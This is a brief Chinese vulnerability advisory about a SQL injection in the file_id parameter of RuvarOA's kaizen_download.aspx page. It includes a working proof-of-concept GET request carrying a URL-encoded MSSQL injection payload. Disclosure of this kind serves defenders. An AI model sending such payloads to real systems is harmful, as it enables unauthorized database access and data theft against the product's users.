RuvarOA kaizen_download.aspx文件file_id参数-SQL注入

日期: 2021-01-19 | 影响软件: RuvarOA | POC: 已公开

漏洞描述

【漏洞对象】RuvarOA 【漏洞描述】RuvarOA璐华OA协同办公平台/CorporateCulture/kaizen_download.aspx文件的file_id参数存在sql注入，可造成数据泄露，甚至服务器被入侵。

PoC代码

GET /CorporateCulture/kaizen_download.aspx?file_id=1%27%29%20and%20%28select%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%27115514%27))%29%3E0-- HTTP/1.1

相关漏洞推荐